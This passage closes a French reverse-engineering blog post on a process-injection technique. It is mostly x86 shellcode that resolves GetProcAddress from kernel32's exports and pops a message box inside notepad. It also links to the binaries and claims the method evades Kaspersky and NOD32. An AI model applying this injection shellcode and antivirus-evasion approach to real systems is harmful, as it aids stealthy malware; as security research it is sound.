#66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;ebx=name VA</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">push</span> <span style="color: #46aa03; font-weight:bold;">edi</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> FindGPA_loop:</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">pop</span> <span style="color: #46aa03; font-weight:bold;">edi</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">jecxz</span> Find_GPA_end <span style="color: #adadad; font-style: italic;">;if ecx=0, no match so we exit</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">dec</span> <span style="color: #46aa03; font-weight:bold;">ecx</span> <span style="color: #adadad; font-style: italic;">;dec ecx till we find GPA</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">mov</span> <span style="color: #46aa03; font-weight:bold;">esi</span>, <span style="color: #66cc66;">[</span><span style="color: #46aa03; font-weight:bold;">ebx</span>+<span style="color: #46aa03; font-weight:bold;">ecx</span>*<span style="color: #ff0000;">4</span><span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;esi=function name RVA</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">add</span> <span style="color: #46aa03; font-weight:bold;">esi</span>, <span style="color: #0000ff;">dword</span> <span style="color: #66cc66;">[</span>_KernelAddr<span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;esi=function name</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">push</span> <span style="color: #46aa03; font-weight:bold;">edi</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">lea</span> <span style="color: #46aa03; font-weight:bold;">edi</span>, <span style="color: #66cc66;">[</span><span style="color: #46aa03; font-weight:bold;">edi</span>+@<span style="color: #0000ff;">name</span><span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;edi=the name we want</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> __1: </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">cmpsb</span> <span style="color: #adadad; font-style: italic;">;cmp byte after byte</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">jnz</span> FindGPA_loop <span style="color: #adadad; font-style: italic;">;different byte means "test the previous export"</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">cmp</span> <span style="color: #0000ff;">byte</span> <span style="color: #66cc66;">[</span><span style="color: #46aa03; font-weight:bold;">edi</span><span style="color: #66cc66;">]</span>, <span style="color: #ff0000;">0</span> <span style="color: #adadad; font-style: italic;">;have we reached the end of the string?</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">je</span> __2 <span style="color: #adadad; font-style: italic;">;yes: find its address</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">jmp</span> __1 <span style="color: #adadad; font-style: italic;">;no: test next bytes</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> __2:</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">pop</span> <span style="color: #46aa03; font-weight:bold;">edi</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">mov</span> <span style="color: #46aa03; font-weight:bold;">ebx</span>, <span style="color: #66cc66;">[</span><span style="color: #46aa03; font-weight:bold;">edx</span>+<span style="color: #ff0000;">024h</span><span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;ebx=ordinal table RVA</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">add</span> <span style="color: #46aa03; font-weight:bold;">ebx</span>, <span style="color: #0000ff;">dword</span> <span style="color: #66cc66;">[</span>_KernelAddr<span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;ebx=ordinal table VA</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">mov</span> <span style="color: #46aa03; font-weight:bold;">cx</span>, <span style="color: #66cc66;">[</span><span style="color: #46aa03; font-weight:bold;">ebx</span>+<span style="color: #46aa03; font-weight:bold;">ecx</span>*<span style="color: #ff0000;">2</span><span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;cx=ordinal of GetProcAddress</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">mov</span> <span style="color: #46aa03; font-weight:bold;">ebx</span>, <span style="color: #66cc66;">[</span><span style="color: #46aa03; font-weight:bold;">edx</span> + <span style="color: #ff0000;">01ch</span><span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;ebx=address table RVA</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">add</span> <span style="color: #46aa03; font-weight:bold;">ebx</span>, <span style="color: #0000ff;">dword</span> <span style="color: #66cc66;">[</span>_KernelAddr<span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;ebx=address table VA</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">mov</span> <span style="color: #46aa03; font-weight:bold;">eax</span>, <span style="color: #66cc66;">[</span><span style="color: #46aa03; font-weight:bold;">ebx</span>+<span style="color: #46aa03; font-weight:bold;">ecx</span>*<span style="color: #ff0000;">4</span><span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;eax=GetProcAddress RVA</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">add</span> <span style="color: #46aa03; font-weight:bold;">eax</span>, <span style="color: #0000ff;">dword</span> <span style="color: #66cc66;">[</span>_KernelAddr<span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;eax=address of GetProcAddress</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">mov</span> <span style="color: #0000ff;">dword</span> <span style="color: #66cc66;">[</span>_GetProcAddress<span style="color: #66cc66;">]</span>,<span style="color: #46aa03; font-weight:bold;">eax</span> <span style="color: #adadad; font-style: italic;">;store it </span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> Find_GPA_end: </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">lea</span> <span style="color: #46aa03; font-weight:bold;">ecx</span> , <span style="color: #66cc66;">[</span>LoadLibStr + <span style="color: #46aa03; font-weight:bold;">edi</span><span style="color: #66cc66;">]</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">push</span> <span style="color: #46aa03; font-weight:bold;">ecx</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">push</span> <span style="color: #0000ff;">dword</span> <span style="color: #66cc66;">[</span>_KernelAddr<span style="color: #66cc66;">]</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">call</span> <span style="color: #66cc66;">[</span>_GetProcAddress<span style="color: #66cc66;">]</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">lea</span> <span style="color: #46aa03; font-weight:bold;">ecx</span> , <span style="color: #66cc66;">[</span>User32Str + <span style="color: #46aa03; font-weight:bold;">edi</span><span style="color: #66cc66;">]</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">push</span> <span style="color: #46aa03; font-weight:bold;">ecx</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">call</span> <span style="color: #46aa03; font-weight:bold;">eax</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">lea</span> <span style="color: #46aa03; font-weight:bold;">ecx</span> , <span style="color: #66cc66;">[</span>MessageBoxStr + <span style="color: #46aa03; font-weight:bold;">edi</span><span style="color: #66cc66;">]</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">push</span> <span style="color: #46aa03; font-weight:bold;">ecx</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">push</span> <span style="color: #46aa03; font-weight:bold;">eax</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">call</span> <span style="color: #0000ff;">dword</span> <span style="color: #66cc66;">[</span>_GetProcAddress<span style="color: #66cc66;">]</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">push</span> <span style="color: #ff0000;">0</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">lea</span> <span style="color: #46aa03; font-weight:bold;">ecx</span> , <span style="color: #66cc66;">[</span>titlestr + <span style="color: #46aa03; font-weight:bold;">edi</span><span style="color: #66cc66;">]</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">push</span> <span style="color: #46aa03; font-weight:bold;">ecx</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">lea</span> <span style="color: #46aa03; font-weight:bold;">ecx</span> , <span style="color: #66cc66;">[</span>mess + <span style="color: #46aa03; font-weight:bold;">edi</span><span style="color: #66cc66;">]</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">push</span> <span style="color: #46aa03; font-weight:bold;">ecx</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">push</span> <span style="color: #ff0000;">0</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">call</span> <span style="color: #46aa03; font-weight:bold;">eax</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">add</span> <span style="color: #46aa03; font-weight:bold;">esp</span> , <span style="color: #ff0000;">3</span>*<span style="color: #ff0000;">4</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">popad</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">popfd</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">pop</span> <span style="color: #46aa03; font-weight:bold;">edi</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">retn</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">@<span style="color: #0000ff;">name</span> <span style="color: #0000ff;">db</span> <span style="color: #7f007f;">"GetProcAddress"</span>,<span style="color: #ff0000;">0</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">LoadLibStr <span style="color: #0000ff;">db</span> <span style="color: #7f007f;">"LoadLibraryA"</span>,<span style="color: #ff0000;">0</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">User32Str <span style="color: #0000ff;">db</span> <span style="color: #7f007f;">"user32.dll"</span>,<span style="color: #ff0000;">0</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">MessageBoxStr <span style="color: #0000ff;">db</span> <span style="color: #7f007f;">"MessageBoxA"</span>,<span style="color: #ff0000;">0</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">titlestr <span style="color: #0000ff;">db</span> <span style="color: #7f007f;">"inject-lolz !"</span>,<span style="color: #ff0000;">0</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">mess <span style="color: #0000ff;">db</span> <span style="color: #7f007f;">"Yé souis diabolique !!!!"</span>,<span style="color: #ff0000;">0</span></div></li></ol></pre>
<p>les binaires sont <a href="http://baboon.rce.free.fr/public/ZwMapLolzSection.rar" hreflang="fr">ICI</a>, pour les tester il vous faut lancer notepad puis ZwMapLolzSection.exe, une zoulie pitite message box "Yé souis diabolique !!!!" devrait apparaitre <img src="/themes/default/smilies/wink.png" alt=";)" class="smiley" /></p>
<p>Pour finir cette technique d'injection n'a pas été détectée par Kaspersky Internet Security 2010 ni par nod32 (merci 0vercl0k[]) mais devrait l'être étant donné la simplicité de la méthode ...</p>
<p>J'ai un peu la flemme de dévelloper un peu plus mon post donc si vous avez des questions : mon_super_pseudo [patat-at] lyua [pouin] org ou laissez moi un pitit commentaire</p>